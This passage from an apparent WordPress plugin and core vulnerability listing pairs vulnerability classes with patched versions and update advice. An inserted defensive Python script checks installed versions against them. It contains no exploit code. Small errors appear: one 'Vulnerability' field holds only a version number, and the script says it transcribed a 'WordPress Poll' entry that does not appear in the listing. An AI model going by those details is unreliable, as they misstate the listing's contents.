Recommended Action: Update to version 2.10.16, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Missing Authorization via ‘start_staging’ and ‘get_staging_progress’
Patched Version: 0.9.91
Recommended Action: Update to version 0.9.91, or a newer patched version

Plugin: Global Content Blocks

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Missing Authorization
Patched Version: 2.5.4.4
Recommended Action: Update to version 2.5.4.4, or a newer patched version

Plugin: Photo Gallery by Supsystic

Vulnerability: Cross-Site Request Forgery to Plugin Settings Change
Patched Version: 1.15.6
Recommended Action: Update to version 1.15.6, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.29.1
Recommended Action: Update to version 3.29.1, or a newer patched version

Plugin: Easy Digital Downloads – Per Product Emails

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Waiting: One-click countdowns

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Portfolio and Projects

Vulnerability: Missing Authorization to Notice Dismissal
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘SaveSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization via ajax_unassign_folders
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Simple Backup

Vulnerability: Arbitrary File Download via Path Traversal
Patched Version: 2.7.11
Recommended Action: Update to version 2.7.11, or a newer patched version

Plugin: Houzez Login Register

Vulnerability: Privilege Escalation
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: WP Crowdfunding

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Klaviyo

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.10
Recommended Action: Update to version 3.0.10, or a newer patched version

Plugin: Pay with Vipps and MobilePay for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.14.14
Recommended Action: Update to version 1.14.14, or a newer patched version

Plugin: Real-Time Find and Replace

Vulnerability: Cross-Site Scripting
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: Simple Page Ordering

Vulnerability: Regular Expression Denial of Service
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Trustprofile and reviews for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.25
Recommended Action: Update to version 3.25, or a newer patched version

Plugin: EazyDocs – Most Powerful Knowledge base, wiki, Documentation Builder Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Missing Authorization to Update License
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Image News Slider

Vulnerability: Arbitrary File Upload
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Contact Form 7 Style

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: PHP Object Injection
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.11.1
Recommended Action: Update to version 5.11.1, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Constant Contact Forms

Vulnerability: Information Disclosure via Log Files
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Shortcodes Finder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Eventr

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Link Whisper Free

Vulnerability: Missing Authorization via init()
Patched Version: 0.6.4
Recommended Action: Update to version 0.6.4, or a newer patched version

Plugin: CRM: Contact Management Simplified – UkuuPeople

Vulnerability: Cross-Site Request Forgery to Favorite Addition/Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Marketing Performance

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘startProcess’ to Arbitrary Redirect via ‘update_link_redirect’ task
Patched Version: 4.5.3
Recommended Action: Update to version 4.5.3, or a newer patched version

Plugin: Bg Bible References

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Yoo Slider – Image Slider & Video Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Email download link

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 7.1
Recommended Action: Update to version 7.1, or a newer patched version

Plugin: Analytics Cat – Google Analytics Made Easy

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Maintenance Mode by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.11
Recommended Action: Update to version 1.7.11, or a newer patched version

Plugin: RESPONSIVE 3D SLIDER

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting via render_dropdown
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: JSmol2WP

Vulnerability: Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Analyticator

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.1
Recommended Action: Update to version 5.2.1, or a newer patched version

Plugin: Product List / Grid View for Woocommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Author Box

Vulnerability: Authenticated (Contributor+) Insecure Direct Object Reference to Arbitrary User Sensitive Information Exposure
Patched Version: 2.52
Recommended Action: Update to version 2.52, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: One Click SSL

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Order Notification for WooCommerce – Get Audio Alert on new Orders

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Interactive Medical Drawing of Human Body

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.12
Recommended Action: Update to version 3.8.12, or a newer patched version

Plugin: Portfolio Gallery – Responsive Image Gallery

Vulnerability: Missing Authorization to Arbitrary Gallery Deletion
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Remove CPT base

Vulnerability: Cross-Site Request Forgery to CPT base deletion
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: We’re Open!

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.47
Recommended Action: Update to version 1.47, or a newer patched version

Plugin: WPJAM Basic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.2.1.1
Recommended Action: Update to version 6.2.1.1, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Student+) SQL Injection
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: SEO Smart Links

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Booking Calendar

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 9.4.3.1
Recommended Action: Update to version 9.4.3.1, or a newer patched version

Plugin: Gallery by BestWebSoft – Customizable Image and Photo Galleries for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.0
Recommended Action: Update to version 4.5.0, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: User Enumeration Bypass via REST API
Patched Version: 9.3.3
Recommended Action: Update to version 9.3.3, or a newer patched version

Plugin: WP Food Manager – Restaurant Menu & Online Food Ordering for WooCommerce – Food Delivery & Pickup – Table Reservation

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: BetterDocs – Advanced AI-Driven Documentation, FAQ & Knowledge Base Tool for Elementor & Gutenberg with Encyclopedia, AI Support, Instant Answers

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: wp2syslog

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NOTICE BOARD

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Crontrol

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: WP Optin Wheel – Gamified Optin Email Marketing Tool for WordPress and WooCommerce

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: WP Symposium

Vulnerability: Cross-Site Scripting
Patched Version: 11.12.08
Recommended Action: Update to version 11.12.08, or a newer patched version

Plugin: Post State Tags

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clockwork SMS Notfications

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Wise Chat

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Alojapro Booking Engine

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Core: WordPress

Vulnerability: Privilege Escalation
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: BA Plus – Before & After Image Slider FREE

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 5.12.1
Recommended Action: Update to version 5.12.1, or a newer patched version

Plugin: PixTypes

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.15
Recommended Action: Update to version 1.4.15, or a newer patched version

Plugin: Process Steps Template Designer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Membership For WooCommerce – SIMPLE MEMBERSHIP PLANS, RECURRING REVENUE, USER PROFILES & SIGNUPS, CONTENT RESTRICTIONS, AND MEMBER LEVELS WITH WOOCOMMERCE MEMBERSHIP

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Checkout with Zelle on Woocommerce

Vulnerability: Missing Authorization
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Leaky Paywall

Vulnerability: Not specified in this listing
Patched Version: 4.16.6
Recommended Action: Update to version 4.16.6, or a newer patched version

Plugin: Ajax Search Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Stock Manager for WooCommerce

Vulnerability: Authorization Bypass
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Simple Telegram

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Embed PDF

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Security Optimizer – The All-In-One Protection Plugin

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Appointments Scheduler

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Arbitrary File Upload
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Foliopress WYSIWYG

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.16
Recommended Action: Update to version 2.6.16, or a newer patched version

Plugin: Post Comments as bbPress Topics

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Theme Switcha – Easily Switch Themes for Development and Testing

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Podcast Importer SecondLine

Vulnerability: SQL Injection
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: My WP Translate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs – My Sticky Elements

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPML

Vulnerability: Reflected Cross-Site Scripting via wp_lang
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: bbPress Move Topics

Vulnerability: PHP Object Injection
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Rise Blocks – A Complete Gutenberg Page Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: GuruWalk Affiliates

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Missing Authorization
Patched Version: 2.0.14
Recommended Action: Update to version 2.0.14, or a newer patched version

Plugin: Blogroll Fun – Show Last Post and Last Update Time

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.8.5
Recommended Action: Update to version 0.8.5, or a newer patched version

Core: WordPress

Vulnerability: Information Disclosure
Patched Version: 3.7.17 (oldest patched branch; each supported branch has its own fixed release, listed below)
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: WP Meteor Website Speed Optimization Addon

Vulnerability: Not specified in this listing
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Simple Security

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: WooCommerce Bookings

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.15.79
Recommended Action: Update to version 1.15.79, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.0.11
Recommended Action: Update to version 1.7.0.11, or a newer patched version

Plugin: Orange Form

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP LINE Notify

Vulnerability: Reflected Cross-Site Scripting via ‘uid’
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Newsletter Popup

Vulnerability: Unauthenticated Stored Cross-Site Scripting via ‘nl_data’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Passster – Password Protect Pages and Content

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.5.5.8
Recommended Action: Update to version 3.5.5.8, or a newer patched version

Plugin: YITH WooCommerce Gift Cards Premium

Vulnerability: Arbitrary File Upload
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in multiple functions in admin/controller.php
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Eonet Manual User Approve

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Preview Link Generator

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Sensitive Data Exposure
Patched Version: 7.3.15.727
Recommended Action: Update to version 7.3.15.727, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Transbank Webpay

Vulnerability: Authenticated (Administrator+) SQL Injection via orderby
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Announce from the Dashboard

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Donations

Vulnerability: Unauthenticated Arbitrary Options Change
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Cross-Site Request Forgery leading to attachment deletion & Path Traversal
Patched Version: 1.14.2.2
Recommended Action: Update to version 1.14.2.2, or a newer patched version

Plugin: WP-PostRatings

Vulnerability: SQL Injection
Patched Version: 1.62
Recommended Action: Update to version 1.62, or a newer patched version

Plugin: Page View Count

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: WP-chgFontSize

Vulnerability: Cross-Site Request Forgery to Settings Update and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Pricing Table

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Bonus for Woo

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8.3
Recommended Action: Update to version 5.8.3, or a newer patched version

Plugin: multi-plugin-installer

Vulnerability: Arbitrary File Read
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: MapifyLite (by MapifyPro)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Redux Framework

Vulnerability: Incorrect Authorization Leading to Arbitrary Plugin Installation and Post Deletion
Patched Version: 4.2.13
Recommended Action: Update to version 4.2.13, or a newer patched version

Plugin: Blog Floating Button

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.13
Recommended Action: Update to version 1.4.13, or a newer patched version

Plugin: Grab & Save

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add Edit Delete Listing Module

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woocommerce Order address Print

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Comments Ratings

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: SpiderVPlayer

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Countdown Widget

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 3.1.9.2
Recommended Action: Update to version 3.1.9.2, or a newer patched version

Plugin: ImageInject

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.26.9
Recommended Action: Update to version 2.26.9, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Media Uploads
Patched Version: 3.7.30 (oldest patched branch; each supported branch has its own fixed release, listed below)
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3
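Every entry in this listing gives a patched version (or, for the WordPress core advisories, one fixed release per supported branch) and tells you to update to it or a newer patched version. The script below is an added example, not code from this listing or from any of the named plugins: it compares installed versions against patched versions segment by segment, which matters because plain string comparison sorts 1.4.3 after 1.4.13 and treats 34.06 and 34.6 as different versions, and for multi-branch core advisories it selects the fix on the installed major.minor branch rather than the first one listed. The installed-version rows and the name-to-patched-version map are constructed for the example; in practice you would feed it the output of `wp plugin list --format=json` (WP-CLI, an assumption, not something this page mentions) and keep the advisory map current.

```python
import re

# Constructed sample (assumption): the shape of `wp plugin list --format=json`
# rows plus a synthetic "WordPress" core row. Not real site data.
INSTALLED = [
    {"name": "WordPress", "version": "4.2.5"},
    {"name": "WP Crontrol", "version": "1.2"},
    {"name": "Blog Floating Button", "version": "1.4.3"},
    {"name": "SEO Smart Links", "version": "3.0"},
    {"name": "WordPress Poll", "version": "34.6"},
    {"name": "Wicked Folders", "version": "2.18.17"},
]

# Advisory data transcribed from the entries in this listing.
# None means the listing reports no patched version.
ADVISORIES = {
    "WordPress": ["3.7.30", "3.8.30", "3.9.28", "4.0.27", "4.1.27", "4.2.24",
                  "4.3.20", "4.4.19", "4.5.18", "4.6.15", "4.7.14", "4.8.10",
                  "4.9.11", "5.0.6", "5.1.2", "5.2.3"],
    "WP Crontrol": ["1.3"],
    "Blog Floating Button": ["1.4.13"],
    "SEO Smart Links": None,
    "WordPress Poll": ["34.06"],
    "Wicked Folders": ["2.18.17"],
}


def parse_version(v):
    """'7.3.15.727' -> (7, 3, 15, 727). Leading zeros are dropped ('34.06' -> 34, 6).
    A segment with no leading digits (e.g. 'beta') becomes -1 so that a
    pre-release sorts below the corresponding release."""
    out = []
    for seg in v.strip().split("."):
        m = re.match(r"\d+", seg)
        out.append(int(m.group()) if m else -1)
    return tuple(out)


def compare_versions(a, b):
    """Return -1, 0 or 1. Shorter tuples are zero-padded so '4.0' == '4.0.0'."""
    pa, pb = parse_version(a), parse_version(b)
    n = max(len(pa), len(pb))
    pa += (0,) * (n - len(pa))
    pb += (0,) * (n - len(pb))
    return (pa > pb) - (pa < pb)


def branch(v):
    """major.minor prefix used to match a core install to its branch release."""
    return parse_version(v)[:2]


def target_version(installed, patched):
    """Prefer the fixed release on the installed major.minor branch (the
    minimal-disruption upgrade); if the advisory lists none for that branch,
    the newest listed release is the target."""
    same_branch = [p for p in patched if branch(p) == branch(installed)]
    pool = same_branch or patched
    return max(pool, key=parse_version)


def assess(installed, advisories):
    """Map each installed component covered by an advisory to a status:
    'ok' (at or above the target), 'vulnerable' (below it), or
    'unpatched' (no fixed version exists; candidate for removal)."""
    report = {}
    for row in installed:
        name, ver = row["name"], row["version"]
        if name not in advisories:
            continue
        patched = advisories[name]
        if patched is None:
            report[name] = {"status": "unpatched", "target": None}
            continue
        tgt = target_version(ver, patched)
        status = "vulnerable" if compare_versions(ver, tgt) < 0 else "ok"
        report[name] = {"status": status, "target": tgt}
    return report


if __name__ == "__main__":
    for name, info in assess(INSTALLED, ADVISORIES).items():
        print(f"{name}: {info['status']} (target: {info['target']})")
```

An install that is older than every branch in a multi-branch advisory gets the newest listed release as its target, since no branch-specific fix exists for it; an install newer than every listed branch compares as ok. Components reported as unpatched match the listing's advice to review mitigations or remove the software.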

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via wpbe_update_page_field
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Yellow Swordfish Simple Forum

Vulnerability: SQL Injection
Patched Version: No patched version available
